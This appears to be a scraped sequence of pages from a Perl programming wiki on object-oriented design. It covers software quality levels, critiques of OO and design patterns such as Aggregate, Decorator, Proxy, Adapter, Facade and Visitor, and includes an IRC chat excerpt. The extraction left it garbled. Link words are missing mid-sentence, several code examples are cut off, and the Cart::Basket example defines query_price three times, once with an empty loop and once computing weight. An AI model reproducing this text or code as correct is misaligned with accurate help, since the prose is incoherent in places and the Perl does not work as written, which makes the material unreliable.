advent of, most features are being implemented as code buried in pages. Some auxillary scripts may be converted to. Features: Auxillary Scripts L<<63>ActiveWikiPages> Features Misc Todo: Install Notes See for some notes on installing this software. Thanks To "TinyWiki" in TinyWiki uses code from in fogindex.cgi, code from and from Moogle Stuffy Software in diff.cgi, with bug fixes and contributions in wiki.cgi from and other people whose names I hope I remember soon... oops. <table cellspacing="0" cellpadding="0"><tr><td><img src=""><img src=""><img src=""><img src=""><img src=""></td></tr><tr><td><img src=""><img src=""><img src=""><img src=""><img src=""></td></tr></table> The little graphic is meant to be tiled and is care of at See for more and more about them. Hint: Its a plot of an x, y function. See Also:,,, "GuestLog" in GuestLog,,,, $Id: "TinyWiki" in TinyWiki,v 1.266 2003/06/22 05:58:43 httpd Exp $ Pages Linking to This Page: Software, like all things, has quality. Which scenarios describe the projects you've worked on? Which of these are familiar? Which have you over come through experience? 1. Works when no one is watching When the requirements are completely out of control, many programmers celebrate even having reached this point. 2. Works if you do it just right Too many applications, most not written in Perl, make it to this point and stop cold. Forget reusable, this isn't even usable. 3. Trying most things once, it doesn't break You may be tempted to give a software demo in front of a crowded auditorium at this point. Don't. 4. Other people tried it, and it seems to work Software released to the community often starts at this point. Before this point, there isn't enough benefit for it to be worthwhile for them to fix your bugs. 5. Been in production for a while, and you're running out of bugs to fix Most perl programs quickly shot to level 5, and stop. Level 5 is a good level. Since its really about the users, not the developers, Perl has traditionally been great for end users. 6. Other programmers are adding to it, so you made the code understandable Other programs can incorporate this program into theirs, or vice versa, and benefit from your work. 7. A lot of people are working on it, so you made it modular and well laid out logically Resistant to damage caused by new features, different requirements, and new programmers. In a lot of ways, like a Spider Plant: fractal, prolific, and cute. 8. It has turned into a generic framework for doing things of this kind, and has been separated from early assumption Different products that do the same thing but better are different, but are based on this class, can easily be created. 9. Hoards of the nit-pickiest people on the net have picked every last nit out of it College classes are dedicated to exploring your code. Aspiring programmers marvel at the sheer beauty of it. Most programmers are smart and hard working. Things go wrong mysteriously. Changing requirements stress the design of a program. A program at level 5 can quickly turn into a level 2 program, if people start working on it who don't understand the entire design, or the original design doesn't take into account the direction it takes into the future and no one adapts the design. This is the primary reason to shoot for a level 7 program. Having net-god status thrust upon you and having to live up to it, or attempting to attain net-god status is the primary reason to shoot for level 9. Of course, if the program is a few lines long, none of this amounts to a hill of beans. Software does not wear out in the traditional sense of machinery with moving parts. However, software is constantly being used in ways its authors never expected (often uncovering errors), and end users are constantly demanding extensions to their software. -, Because we don't know how programs will reinvent themselves, we don't know how to design an "Interface" [1] , what composite types are involved, and what containment and inheritance hierarchies will look like. In the beginning, we seldom know that a program will grow into this at all! Perl's easy going attitude and powerful features shine here. After a program has devised a solution to a logic problem, and after it has proved its continued usefulness, we have a route for improvement. That's about all there is to it. Now you need just to go off and buy a book about object-oriented design methodology, and bang your forehead with it for the next six months or so. - "PerlDoc" in PerlDoc:perlobj Objects allow arbitrary arrangements of useful logic. This enables software to scale, exhibit flexibility within its development cycle, and within the life on a single invocation. Implementations of different facilities can be swapped out not only during development, but while the program is running. Objects don't help you finish a boring program quicker. They don't help much with diddling with a bit of code until it works. They don't magically make your programs maintainable and extensible. Many Perl programmers happily blast OO. I believe every idea has its time and place. Clearly, small scripts aren't the place for OO, and before the code is even working isn't the time. Knowing when and how to use OO means knowing how to benefit from it without it getting in the way. Conventional wisdom says that you can't graft objects onto an existing design. Perhaps you're already a Perl fan because it lets you break rules. This is one that needs breaking. In Perl, you can indeed bless [2] an existing datastructure into object-hood. Graphical User Interfaces [3] proved the value of Object Oriented programming: see. Everything that gets drawn on your screen shares are few similarity: it has an appearance that only it knows how to draw. It can inside of another object, such as menus can be in title bars and buttons can be in windows. It can send messages when activated to other objects which control the behavior of the application. Versions of components customized for appearance or behavior could easily be created, extending existing code. Taking advantage of these similarities allowed graphical elements to be mixed and matched, and allowed the application to treat similar elements in the same way. It also allowed complex structures to be arranged at run time and continiously revised as the user moved things around on the screen and opened windows. The possibilities are built in rather than the limits. The gospel spilled out. Large applications and operating systems adopted the tenets. Web programming adopted it after a rash of horrible overgrown "scripts" mostly written by Perl programmers. Software Engineering has traditionally meant applying the right algorithm for the job. Most University educations focus on understanding algorithms. This is important, and, O'Reilly Press, is good reading on the topc. Attention to the overall structure of the program, how the algorithms fit together, and building software with (at least the appearance of) a grand design is the trendy new wave. With this in mind, lets think of Objects as tools, just like any other Perl shortcut or magic. Remember - There is More Than One Way To Do It. ||See Also programming books tell you what an program looks like, and all of the benefits of writing code in this style. Too often, they don't tell you how to arrive at this ideal. The result has been large amounts of code that use OO features, but miss the boat on benefitting from them. Since we're using them strictly for fun and profit, we're going to concentrate on the exact utility of each idea, and when it is useful to apply it. "DesignPatterns" are parables of good software design. Good parables have a cast of evil creatures, good creatures, and a moral. The follies of evil become evident. Lessons are learned. Sometimes, the evil creatures aren't killed, but change their ways. represent an ideal, explain the ideal, and give a path, all in neat little case studies. Think of it as your software bible. "DesignPatternsElementsOfReusableSoftwareComponents" brought to computer science. When it did, it talked about OO constructs exclusively. Since Perl programs combine many other ideas, we're going to extend the concept. Objects are data attached to code; "LambdaClosures" are code attached to data. "Exporting" lets one module alter the world of another. Usually this means adding keywords, but there are few limits. Perl's introspective, capabilities open up a new area of investigation. Perl is multi-paradigmatic, and we should be too. XXX I apologize for the length of this letter, for I lacked the time to make it shorter. -- Blaise Pascal Are Design Patterns worth it? Programmers freshly exposed to Design Patterns start building Winchester mansions [4] The creations themselves could likewise said be garish curiosities, Victorian in their own right. The same disease has been noted in programmers first exposed to the style of Scheme and programmers first exposed to programming. Creatively applying to a problem quickly degenerates into creatively making everything an object. Soon every variable, operator, condition, state, state transition, record, and connection is an object. Don't laugh. I've read serious texts that have turned state transitions into objects [5]. There is a difference between building an abstraction and abstract building. I'd have to answer the question "no" for most programmers: aren't worth it. On the other hand, most programmers don't program Perl. Perl programmers already have well-ventilated feet. To me, reading code is often like reading Atari BASIC (or any other non-procedural BASIC, for that matter). Finding out where values come from is a riddle. Names of objects and constructor prototypes give hints about how things are arranged, which let you wager a guess about where it probably should come from, which is sometimes where they do come from. The code is a web, and values tend to travel pretty darn far across it. On the other hand, in BASIC, important constants are near the top. I think BASIC wins this one. BASIC programs were proud of their constants: the fact that they were made into variables instead of repeated hardcodes, and placed at the top of the file, let them proudly display them as the easy to change options they are. In OO programming style, something is either adjusted with a GUI preferences screen, or its a shameful bit of post-war relic. The bad news is in order to be cleansed of all sin in this nihilist religion, you need an infinite number of config screens to keep up with the growing number of options of the growing program: there is no upper bound and no end to this race. [6]. At some point, things break down, and some foundation must be hardcoded, somewhere. The gentle art of bootstrapping, non GUI editable config files, and compile-time preferences have an enduring place in software. Likewise, the breaks need to be put on OO. Perl programs haven't reached this level of garishness yet. Perl is a humble language, as says, so with some ties to our roots, perspective, and frequent trips to the confessional, it may never become garish. Lets hope. Systems of Object relationships should never create more complexity than they clear up. This is an important and powerful motive to stop OO-ifying a program at a certain point. OO-ifying a program should make the program shorter, more readable, easier to prototype, cleaner, more robust - everything that OO zealots promised. If it doesn't it isn't a fault of OO or the OO zealots, its your fault - you've gone too far. An important tip of the hat to goes here. His "'Design Patterns' Aren't" lightning talk voiced some latent objections I couldn't quite formulate., author of, conceived of design patterns for architecture. His book doesn't tell you what to build, nor how to build it. To quote M. J. Dominus, //The problem Alexander is trying to solve is: How can you distribute responsibility for design through all levels of a large hierarchy, while still maintaining consistency and harmony of overall design?// Convention and communication are key, especially since convention in Perl is purely voluntary. Alexander's book is concerned with the level immediately above and immediately below yours, in addition to what you're doing. To think of space being distributed not only according to boundaries but according to delegation and impact is novel. When designing a city, planning for neighborhoods, public t ransportation, and intertwined natural areas are smaller scale architectural elements. When designing a school, park, or housing community, they are larger, encompassing architectural elements. Designing a nice whatever is important, but fitting it into the surrounding picture, at the same time thinking of the people who will pick up your work where you leave it, is paramount. This cuts deeper to the heart of encapsulation and delegation than any single programming technique. Architecture is often seen as a luxury or a frill, or the indulgent pursuit of lily-gilding compulsives who have no concern for the bottom line. -- Pattern Language of Program Design IV Architects know how to design skylights, and they delegate the actual construction of architectural objects to qualified builders. The primary job of the architect is a creative one: designing something functional that uses standard elements to create custom solutions for unanticipated specifications. This is remarkably similar to the plight of the programmer, baring one difference: programmers have to do the construction themselves. Being bogged down in this labor-intensive discipline can suck time away from contemplating the bigger picture. The mention of a skylight makes an architect giddy as he visualizes the light playing across the open spaces. The mention of a skylight makes a builder sigh as he ponders reinforcing the roof, hanging drywall in the roof, and more trim work. Not only can being bogged down in this level of detail keep programmers from appreciating architectural elements of software, it can keep them from learning about them at all. If that isn't enough, only recently was any effort made to catalog them. To top it all off, clients don't ask for architecturally sound software: they ask for huge amounts of square footage decorated with endless amounts of cheap facade. Design is cast away as an inconvenient nuisance that limits how much software can be churned out how fast. Architects are judged by the quality of their work. Programmers are judged by the quantity of their work. Architects design stable structures, but they also creatively ply their craft to devise ways to make their customers value the structure more. The structures that pass the test of time are not only the most solid ones, but the most innovative, imaginative, inspirational, and useful. That being said, its important to decide what to build, and how to build it, on your own. It is also important to know what is available to build, and the techniques available to do so. Being the designer-constructor, you have to pay your own price for your design errors. Programmers are, in their hearts, architects, and the first thing they want to do when they get to a site is to bulldoze the place flat and build something grand. - External Pages Linking to This Page: Eventually you wind up with libraries that are more trouble to reuse than rewrite from scratch -. OO isn't real, in the sense that it's an idea. There are seldom litmus tests for presence of ideas. It isn't a feature of a language that makes your program better. Instead, it is a collection of ideas, and facilities in the language, to apply these ideas. I won't ever discuss wither or not a language is an language. Early C++ compilers compiled C++ down to C and fed it to a C compiler. This doesn't make C++ any less OO. In fact, no matter what the language and its basic premises, they all run on the same computers and compile down to the same languages that computer processors can understand. As with anything that is built up too much, results fall short of expectations. While many people are avid believers in OO, others are quick to point out cases where it does more harm than good. Before we do anything else, lets look at exactly what OO is, and what it isn't. A good, hard, honest evaluation will set reasonable expectations. Reasonable expectations will keep everyone happy. Making the program do its own checking frees you from much of the debugging work. See, "TypeSafety" in TypeSafety, "DesignContract" in DesignContract. It needn't be. Perl is an idiomatic language and shouldn't change to suit OO's style. See. We begin with the part of the language which defines a town or a community.. - A NP Complete problems take an exponential, relative to the amount of input, to complete. Calling something "NP Complete" describes it at a problem not worth trying to solve, or only trying to solve in a very approximate fashion. See. Contrived interfaces result from arrogantly believing that every aspect of the design of the program can be anticipated. This is akin to playing out a game of chess without touching a piece. All of the decision making in the world do a bit of good if it doesn't take reality into account, and reality requires constant probing to understand. Every program can be reduced by one instruction, and every program has at least one bug. Therefore, any program can be reduced to one instruction which doesn't work. -- Unknown XXX OO has been marketed as making planning easy. Planning without feedback is easy but useless. Planning with hypothetical feedback is both difficult and useless. I propose that planning to make design changes is far more important than any other planning you will do. Knowing when and how to restructure code applies equally to procedural and OO code. OO discipline only helps make the process easier. No feedback means no quality in what you do. A project without a prototype is like a candle without a wick. - No feedback means no opportunity for improvement. Old timers blame the disappearance of punch cards for the deterioration in software quality [7]. Using punch cards forces you to stop and think things through. Interactive programming lets you guess your way through, often never really understanding the situation. A language that makes you be explicit about your intentions in great detail is a throw back to punch cards, in a way. Guessing has its place in sounding out theories (and passing exams). Having a compiler that can give you critical feedback may be a good trade off. Not having a product means no feedback - no feedback from the compiler, or from sounding out the design. The only constant is change. An assault on large problems employs a succession of programs, most of which spring into existence en route. These programs are rife with issues that appear to be particular to the problem at hand. -- Alan J. Perlis, Foreword,. When asked what the most important tools of an architect are, replied, The eraser in the drafting room and the sledgehammer at the construction site. Good design comes from bad design eventually, if you learn from your mistakes. This may be the only software engineering manual that desn't beg and plead with you to "do it right the first time". You have to pick your battles though: for any program, some problems are design flaws, some are design trade-offs. How do you "fix" a trade off? See Also:,,,,,,,, "AboutTheAuthor" in AboutTheAuthor, "AboutObjects" in AboutObjects <!-- <|dave|> you're right. OO can be useful. but the thing is, it gets forced down our throats > feel free to edit any page. there is a little "edit" link in the bottom left corner. <|dave|> everyone tries to bend a project to make it OO <|dave|> when some of them just arent suited to OO <uri> |dave|: i didn't force it down my throat. i designed with it and not against it. my project needed polymorphism and OO perl does that. <|dave|> few projects suit OO <uri> |dave|: wrong. some do. <uri> many do. <|dave|> < 50% <uri> but many projects are poorly architected in any paradigm > |dave| - there was an idea that modeling the project using OO/usecase etc would make the program scalable. that never happened. that failed horribly. not only cna't you plan for something that complex, but throwing objets in the mix doesn't help at all. <uri> architecture is key. that is shitty all over > objects are much better used to clean up existing code incrementally than try to avoid the np-complete problem of predicting the future <uri> scrottie: same there. architecture is key. always will be. <uri> architecture is not OO. it is making a coherent whole out of parts > learning as you go is key. constant injetions of architecture rather than a poorly planned attempt up front is key. <uri> no one does architecture at all. <|dave|> when i look at OO code, i just cant stand it. so much overhead.... people work in micoarchitecture making so many tiny little improvements to squeeze as much performance as possible out of a computer, then people f*ck it away using OO <uri> |dave|: you haven't seen good OO code then. > |dave| - trying to delegate everything "just in case" makes a special kind of speghetti code. you can't figure out the flow of the program, how things are constructed, where values come from - because it is so indirect <uri> rare but good OO code makes sense. > good OO code has abstraction removed as often as it has it added, and people hiding behind OO to make their code good aren't willing to do that <|dave|> what do you mean scrottie <|dave|> about "just in case" i mean > if a constructor gets called, and you have to dig through 30 different constructor calls, methods, delegations, etc to figure out where the hell the values came from, something is wrong > oh > people add a lot of delegation and abstraction "just in case it might be useful" to keeping things modular > which, as it turns out, is a complete rat race. it is impossible to add enough abstraction up front to have the exact right abstraction you end up needing <|dave|> yeah > then, they refuse to remove any of it > leaving a tangled web as bad as any speghetti code > spaghetti? i can't spell <|dave|> right on > PerlDesignPatterns tries to expose aspiring OO programmers to as many *other* ideas as possible <|dave|> one reason im anti-OO is that someone has to be --> External Pages Linking to This Page: Synopsis: Related packages can be created where they are defined. When: Adding another Interface to an object, passing out callbacks, creating helper objects. Moving inheritance, or interfaces, out of your object but not far from it.(); } # there should be two underscores on either side of PACKAGE. TinyWiki is having a bug. sorry. WebsafeColors::Iterator ( Iterator) implements all of the functions required to be an instance of Iterator. If something takes an argument, and insists it implement Iterator, it will accept the result of calling getIterator() on a object. However, itself does not implement these methods, or inherit the base abstract class for Iterators. The package that does is contained entirely inside's getIterator() method. This technique lets you localize the impact of having to provide an interface, and keep code related to supporting that interface together and away from the rest of the code. This supports the basic idea of putting code where it belongs. When we return a WebsafeColors::Iterator ( Iterator) object, that object uses a variable defined lexically inside. Since defined lexically (contained inside the block, in this case, the method) to the variable $parentThis, we hold a reference to it. If it changes, we see the changes. If the parent is destroyed before the WebsafeColors::Iterator ( Iterator) object we return is, this variable will live on until all references are destroyed. This way, we can share data efficiently with our parent. In some situations, it may be better to copy the data before giving it to the inner class, or to use Immutable Objects, explained in Chapter XXX. Our Perl implementation could cause problems if two threads contend for the same datastructure, even by way of different objects. Thus, if used in a threading environment, the and all of its returned inner classes would need to synchronize on the same object for access to the array of colors. Failure to do so would lead to iterators that miss colors, end prematurely, or overrun the array. "BiDirectionalRelationshipToUnidirectional" in BiDirectionalRelationshipToUnidirectional talks about how "InnerClasses" in InnerClasses may be employed to cleanly build structures of mutually referring objects. "AdapterPattern" in AdapterPattern is similar to "InnerClasses" in InnerClasses, but the adapter has no access to lexical data, and sits in a seperate file. Adapters can be (and usually are) added after the fact, and have the advantage of not requiring tampering with a class to implement. "CurryingConcept" in CurryingConcept talks about creating method-level wrappers to serve as adapters. An "IteratorInterface" in IteratorInterface is a good use of "InnerClasses" in InnerClasses. Interfaces clutter up a namespace with lots of methods designed to present the data and logic in an object is various ways. The "IteratorInterface" in IteratorInterface encapsulates the requirements, keeping things as neat as possible.,, See Also External Pages Linking to This Page: Members of a common subclass are each known to have certain methods - that is, they all implement a given interface. These methods return information about the state of that perticular object, or make changes to its state. It does happen that an application is concerned with an aggregation, or an amalgamation, of data from several object of the same type. This leads to code being repeated around the program: my $subtotal; foreach my $item (@cart) { $subtotal += $item->query_price(); } my $weight; foreach my $item (@cart) { $weight += $item->query_weight(); } # and so on Representing individual objects, when the application is concerned about the general state of several objects, is an. This is a common mismatch: programmers feel obligated to model the world in minute detail then are pressed with the problem of giving it all a high level interface. "LayeringPattern" in LayeringPattern tells us to employ increasing levels of abstraction. Create an object as a wrapper, using the same API as the objects being aggregated. Speak of objects in terms of the required interface - see "AbstractClass" in AbstractClass. This means using a common type as an entry, but allow the container to hold other that subclass it or imlpement it as an interface. Define its accessors to return aggregate information on the objects it contains. package Cart::Basket; use base 'Cart::Item'; sub query_price { my $self = shift; my $contents = $self->{contents}; foreach my $item (@$contents) { } } sub add_item { my $self = shift; my $contents = $self->{contents}; my $item = shift; $item->isa('Cart::Item') or die; push @$contents, $item; return 1; } # query_ routines: sub query_price { my $self = shift; my $contents = $self->{contents}; my $subtotal; foreach my $item (@$contents) { $subtotal += $item->query_price(); } return $subtotal; } sub query_price { my $self = shift; my $contents = $self->{contents}; my $weight; foreach my $item (@$contents) { $weight += $item->query_weight(); } return $weight; } The aggregation logic, in this case, totalling, need only exist in this container, rather than being strewn around the entire program. Less code, less, fewer depencies, more flexibility. We have an object of base type Cart::Item that itself holds other Cart::Item objects. That makes us recursive and nestable - one basket could hold several items along with another basket, into which other items and baskets could be placed. You may or may not want to do this intentionally, but to someone casually calling -query_price()> on your Cart::Basket object won't have to concern himself with this - things will just work. This will break. Unless the advice of "AbstractRootClasses" in AbstractRootClasses is followed and different implementations of the same thing share the same interface, the basket can't confidently aggregate things. Unless the advice of "StateVsClass" in StateVsClass is heeded, "AbstractRootClasses" in AbstractRootClasses will never be acheived: the temptation to draw distinctions between classes that lack certian functions will be too strong. These distinctions run counter to "AbstractRootClasses" in AbstractRootClasses, causing segmentation and proliferation of interfaces for no good reason. This proliferation of types prevents aggregation in baskets and containers. Avoid this vicious cycle. Parrots that don't squak are still parrots. "IteratorInterface" in IteratorInterface blurb - aggregation is kind of like iteration in that they both present information gleaned from a number of objects through a tidy interface in one object. While "IteratorInterface" in IteratorInterface deals with each contained or known object in turn, "AggregatePattern" in AggregatePattern summerizes them in one fell swoop. "ContainerPattern" in ContainerPattern continues (duplicates) this, with more depth, more gotchas, and more references. Categories See Also Problem: The goals of "TypeSafety" in TypeSafety and reusable code clash when attempting to reuse containers of other objects. Solution: Rethink interfaces. Objects created to hold other objects. Queues, FIFOs/stacks, buffers, shopping carts, and caches all fit this description. has an example of recursing through a network of objects to find them all, where a queue is used to hold unexplored paths. "IteratorInterface" in IteratorInterface is an important part of all objects that act as containers in one way or another. It provides a consistent way to loop through that containers contents: any container should be functionally interchangable with any other for the purposes of inspecting their contents. This employes the ideas of "AbstractRootClasses" in AbstractRootClasses and "AbstractClass" in AbstractClass. talks about generators for containers. "TypeSafety" in TypeSafety breaks down when presented with generic, reusable containers that can hold any type of data. If a container only holds one specific type of data, we know any items retreived from it are of the correct type, and no type errors can occur, but then we can't reuse that container. follows C++'s ideas of templates, and provides a generic implementation that can create instances tailored to specific data types to enforce safety. purists will find this of interest. and "StateVsClass" in StateVsClass talk about other, more present, type issues that crop up when creating containers full of subclasses of a certain type. What if one subclass doesn't do something the superclass does? Model it as state. Null-methods are okey. Don't fork the inheritance to remove a feature. Similar to "IntroduceNullObject" in IntroduceNullObject, but for methods. Hmm.?, section 5.19, has an example of a basket that cores fruit. How could this possibly made general? Anything other than a fruit would need a -core()> method that does nothing, requiring a base class implementing a stub core() to be inherited by all. Extract a generic interface: Containers should maintain relationships between objects they contain when the relationships are too numerous or abstract. An object that is part of a series might have links to the next and previous objects in that sequence: package LinkedList::Link; sub new { bless { prev => undef, next => undef }, $_[0]; } sub next { $_[0]->{next} } sub set_next { $_[0]->{next} = $_[1] } sub prev { $_[0]->{prev} } sub set_prev { $_[0]->{prev} = $_[1] } See for an explanation of this style of code, if you must. The objects place in the sequence makes sense to be part of the object. Each object can point you at the next one, following the "LawOfDemeter" in LawOfDemeter. Should the object be part of two linked lists, or three linked lists, or an arbitrary number of linked lists, no fixed method can be called to deturmine the "next" object in the sequence, because no assumption can be made about which sequence you're talking about. An access would have to exist for previous and next for each sequence the object is part of. It makes more sense to seperate the linking from the object. Rather than adding the code to do whatever to LinkedList::Link, LinkedList::Link should delegate to it: see. The object would be bare of any linked list logic, though several LinkedList::Link objects may hold a reference to it, and it might be part of an arbitrary number of linked lists, or other data structures. See "ObjectsAndRelationalDatabaseSystems" in ObjectsAndRelationalDatabaseSystems for more on the problems of complex inter-object relationships. See Also Synopsis: Attach additional logic to an existing object. When: Something about an object needs to change. Objects can have attributes that change something about them. Decorators provide a flexible alternative to subclassing for extending functionality. used stacking burger toppings as an example. It's a good example. Lets use taco toppings instead, so we aren't copying them too blatantly. Lets imagine that there is a taco concession in a mall. We won't call it a Mexican restaurant. That would be a stretch. Most of their tacos sit under a heat lamp, pre-made, waiting for someone to order the standard taco. A rash of bowel disrupting bacteria outbreaks brought suspicion on the heat lamps, so people began ordering tacos with and without all kinds of weird toppings in attempt to foil the pre-making efforts and get a fresh taco. The concessions stand management found that the cashiers were making a lot of errors adding up the costs of the toppings, so they complained to the corporate office. Corporate office searches the web for "a programmer that doesn't interview like they are reading from a script and who doesn't design patterns using taco toppings like the last guy", and hires the first person that comes up: a Perl programmer! [8]. This programmer could write something like: #. There are two gotchas here, though. What if we want a taco with extra, extra tomatos? Topping::Tomato ( Tomato) would be told to inherit itself. This would create an endless loop! All tomatos would have tomatos are their parent, not just the last one added. Base taco would be forgotten about. The real problem here is that we're modifying the whole class - not just the particular instance of the tomato we added last. This would keep us from using a multithreaded cash register shared by two people, and it would keep us from having two taco orders on the same tab, each with different toppings. Dynamic inheritance is a cool trick, but you must remember that its effects are global. Reserve it for creating objects of a new, unique name, of user specification, and perhaps a few similar applications. See and "AbstractFactory" in AbstractFactory for more on custom-crafted objects. For some reason, this mess reminds me of "SelfJoiningData" in SelfJoiningData. For our purposes, though, this won't fly. The linked list approach is the right approach. We need to instantiate individual toppings as objects, so that they each have private data. In this private data, we need to store the relationship: what the topping is topping is an attribute of each topping. See "InstanceVariables" in InstanceVariables for more on keeping data private to an instance of an object. # of this strength in this example. The query_price() method of the taco object just passes the request right along, we any math we want can be done. A two-for-taco-tappings-Tuesday, where all toppings were half price on Tuesdays, would show off the strengths of the "DecoratorPattern" in DecoratorPattern. With a press of a button, a new object could be pushed onto the front of the list that defined a price method that just returns half of whatever the price_method() in the next object returns. The important thing to note is that we can stack logic by inserting one object in front of another when "has-a" relationships. For yet another approach, see the "AggregatePattern" in AggregatePattern. For the sake of simplicity and clarity, each of these approaches has a different API. There is no reason they couldn't have been done consistently. See Also,, External Pages Linking to This Page: Problem: Objects talk to each other using an interface that has been overburdoned with the needs of security, access coherence, or historic versions of the interface. Solution: Move access-centric features of the interface into a Proxy object. Put it in charge of security, or implement the translation between the historic interface there, or use it to inforce access coherency. The Proxy Object is the grand daddy of all encapsulation patterns due to its sheer lack of scope. Any other delegation pattern is just a special case of this general case. The Problem/Solution lines list some possible uses, but they could just as well be phrased "one objects demands too much of another - have the second handle some of the work and delegate the rest". A Proxy inherits the same base class or interface as the object it contains. It can be a generic proxy, that wraps arbitrary objects, or it could be custom crafted to stand in for a certain class.: Other ideas, such as the "FacadePattern" in FacadePattern, are based on this. This Pattern supports the idea of encapsulation. requirements touch on "AccumulateAndFire" in AccumulateAndFire., See Also Problem: Code will work with one kind of object, but there is another kind of object that should be able to be used in its place, that should work, but doesn't. Two Interfaces are incompatible implementations of the same idea. Using vender products interchangeably. Or, an object that requires one kind of object, when it should accept several different kinds. Solution: Translate one interface to the other using a dedicated Adapter object. The Adapter is a case of the "ProxyPattern" in ProxyPattern. It isn't even a special case. You could call it an example of a Proxy. Or vice versa. One object requires a certain type of object. You have another object that provides an interface. You want to use them together. You could subclass one of the objects, but you'd lose polymorphism, unless all subclasses and compatible objects were subclassed individually as well - which wreaks of the or parallel inheritance hierachies. Yuck. Instead, make a generic container that is accepted by any of the first class, and contains anything derived from the second class, which translates between the two disparate interfaces. XXX despretely needs a diagram here I can't think of an example that doesnt' insult the intelligence. I'll have to look for one in the wild. XXX Discussion XXX Code -'s version from his Design Patterns talk "InnerClasses" in InnerClasses are often used as Adapters. In Java, there is no way to pass a closure, a subroutine pointer, or any other first class object other than an actual object. Java 1.0 required you to create a class for each and every you needed. [9] This was clearly unworkable. Java 1.1 eased the matter by allowing these objects to be defined with a short hand syntax, and allowed the definition to be placed in your code right where they are passed. See "InnerClasses" in InnerClasses for more information. Categories See Also Problem: A class is unwieldy to use. You don't want to be tied to that interface or implementation. Your code is becoming closely tied to a class that you don't like, or you spend a lot of time dealing with a difficult interface, or several programmers on your team have to learn a complex subject to accomplish a few simple tasks. Solution: Write a new interface to it that translates between your simple requests and perhaps automates tedious things you do frequently. Normally, you write for the interface of the class that you're using today, and if you have to use a different class tomorrow, you write a Proxy. With a poor or overly complex interface, you may wind up writing for a complex interface, then writing a Proxy to translate that back to a simple interface. A Facade is a neutral ground. It allows you to shuff all of the related undesired complexity should you switch classes. You can replace it with a new Facade that translates the simple interface of the first facade to the simple interface of the replacement class. A "DecoratorPattern" in DecoratorPattern adds complexity to the class it stands in for; a "FacadePattern" in FacadePattern mitigates complexity. Both are cases of the "ProxyPattern" in ProxyPattern. Conceivably, you could replace one package with a horrible interface with another package with a horrible interface. In this case, you would need to stick in an equally complex Facade, but the code using the interface could remain blissfully ignorant of the whole ordeal. - "The Facade Design Pattern" by brian d foy, The Perl Review, v0 i4, Credits:, See Also Problem: Polymorphic objects (interchangeable objects) pass sets of information to each other and return it back to each other. When passed in array form, it is difficult to add or remove arguments, and optional arguments require unsightly placeholders. Solution: Rather than maintain the method calls and returns in all of the calling and callee objects, you put the results in a new, intermediate object type. When you rename, insert, or delete a passed or returned parameter, you have to change dozens of objects. Using an intermediate object to hold the results lets you add fields without breaking code anywhere. Deleting or changing a member of the result only affects places actually using that property, and opens the possibility of backwards compatibility catering to accesses to the old field. Contrast this to the horror of positional arguments in a method call: $foo->do($arg, $str, $bleah, $blurgh); Should the arguments do() accepts be changed, every place it is called would need to be changed as well to be consistent. Failure to do so results in no warning and erratic bugs. "TypeSafety" in TypeSafety helps, but this is still no compile time check - missing an a call can lead a program killing bug. Credits: See Also, Problem: The operations that can be performed on a type of object is poorly defined, and always changing. Objects contain large numbers of unrelated methods that perform some sort of logic. Solution: Instead of continuously revising the objects themselves, put the logic is put into interchangeable (polymorphic) Visitor objects. Use a fixed interface between the objects containing data and the objects defining the behavior. Data is contained in objects of a certain class or subclass. Many operations can be performed on objects of this class. The actual operation to be done becomes pluggable. This fits with putting code where it belongs. Infocom, famous for its text adventure games with extremely intelligent natural language parsers, used a permutation of this idea. Any action you wished to perform was stated as a sentence. The parser picked out the verb, direct object, and indirect object. In three rounds, the verb was invoked, then the direct object, then the indirect object. The first round, each object was given a chance to veto the action: perhaps the verb object checked to see if the environment was tagged as being underwater, or the direct object may know for a fact that the material it is made out of is non-flammable, or the indirect object may be a torch that isn't currently lit, and vetos the action because it knows it isn't lit. If not vetoed, this is repeated for a round where changes actually take affect and objects update their state, then for a final round where each object reports on the consequence of the action. In this case, a container object holding information about the sentence, is acted upon by three pluggable objects: the verbs Visitor, the direct objects Visitor, and the indirect objects Visitor. Another example would be a porridge container acted upon by three different bear Visitors objects. Use different objects logic to work on our data. As Perl gives us dynamic inheritance, adding and removing objects from our @ISA array could have the same effect. We simply inherit the object that accesses our data the way we want, when we want. When methods defined in the Visitor object are called, they are presented with all of our data, saving the bother of querying each item individually. This still requires a clean, well defined interface: which methods need to be defined, and how the data is represented. This approach rules out making changes to how we store the data and maintaining compatibility through the interface, as a disadvantage. The Visitor name emphasises that the objects implementing behavior and the object containing data have no real relationship with each other: neither holds on to a reference to the other. They are merely interchangeable parts, to be here today and gone tomorrow. Borrowing from the example by, data items are coerced into a common superclass. This isn't object clean. It is always better to fix problems at the source rather than lurk in wait wielding band-aids [12]. The example does serve to illustrate that data items should be of a common base type to be accepting as a Visitor. foreach my $class ( qw(NAME SYNOPSIS CODE) ) { no strict 'refs'; push @{ "POD::${class}::ISA" }, "POD::POD"; } Not having to use a different method call in each behavior object is key. That would prvent us from using them interchangably. It would introduce need for hardcoded dependencies. We would no longer be able to easily add new behavior objects. Assuming that each behavior object has exactly one method, each method should have the same name. Something generic like -go()> is okey, I suppose. Naming it after the data type it operators on makes more sense, though. If there is a common theme to the behavior objects, abstract it out into the name. -top_taco()> is a fine name. package Taco::Topper; sub top_taco { my $self = shift; die "we're an abstract class, moron. use one of our subclasses" if ref $self eq __PACKAGE__; die "method strangely not implemented in subclass"; } sub new { my $class = shift; bless [], $class; } package Taco::Topper::Beef; sub top_taco { my $self = shift; my $taco = shift; if($taco->query_flags()) { die "idiot! the beef goes on first! this taco is ruined!"; } $taco->set_flags(0xdeadbeef); $taco->set_cost($taco->query_cost() + 0.95); } package Taco::Topper::Cheese; sub top_taco { my $self = shift; my $taco = shift; if(! $taco->query_flag(0xdeadbeef) and ! $taco->query_flag(0xdeadb14d)) { # user is a vegitarian. give them a sympathy discount because we feel # bad for them for some strange reason, even though they'll outlive us by 10 years $taco->set_cost($taco->query_cost() - 1.70); } $taco->set_flags(0xc43323); $taco->set_cost($taco->query_cost() + 0.95); } package Taco::Topper::Gravy; # and so on... Gravy? On a taco? Yuck! In real life, places in the mall that serve "tacos" also tend to serve fries, burgers, hotdogs, and other dubiously non-quasi-Mexican food. It doesn't make sense to have one vat of cheese for the nachos, another for tacos, and yet another for cheesy-gravy-fries. The topper should be able to apply cheese to any of them. Keep in mind that these behavior classes work on a general class of objects, not merely one object. A burger could be a subclass of a taco. See "StateVsClass" in StateVsClass for some thoughts on what makes a good subclass. The taco object could then do something vaguley along the lines of... $topping_counter->get_cheese_gun()->top_taco($self); ... where $topping_counter holds our different topping guns, and get_cheese_gun() returns a cached instance of 